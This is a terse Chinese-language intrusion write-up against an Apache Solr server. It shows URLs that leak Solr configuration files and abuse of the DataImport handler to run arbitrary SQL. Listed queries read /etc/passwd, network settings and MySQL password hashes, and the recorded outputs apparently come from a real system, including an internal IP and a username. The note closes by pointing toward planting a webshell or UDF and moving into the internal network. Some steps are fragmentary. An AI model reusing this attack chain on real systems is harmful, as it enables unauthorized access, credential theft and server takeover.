1) solr泄露数据库配置信息
http://TARGET/solr/admin/file/?file=solrconfig.xml 找到data-import中的值data-import-value.
http://TARGET/solr/admin/file/?file=data-import-value.xml
2) 低版本中存在XXE
3. 第一个信息挺有价值,就沿着这个方向呗
4. 自己环境和网上的环境测试了一下,对于1)公开的漏洞,其实不需要那么麻烦
配置文件solrconfig.xml:
Dataimport:
不过有这些好像还不够
5. 开启上帝模式
6. query=SQL
下面就可以执行任意的sql语句了
select version() -> 5.5.13
select users()
select database()
show grants for ‘zyw’@’%’
select load_file(‘/etc/issue’) -> CentOS 5.6
select load_file(‘/etc/sysconfig/network-scripts/ifcfg-eth0’) -> IPADDR=10.10.20.18
select @@basedir;
select host,user,password from mysql.user; –> root 和 zyw密码一致
select load_file(‘/etc/passwd’); ->返回 Base64 内容
返回内容Base64解码
7. 下面就是写webshell 或者 UDF… 内网…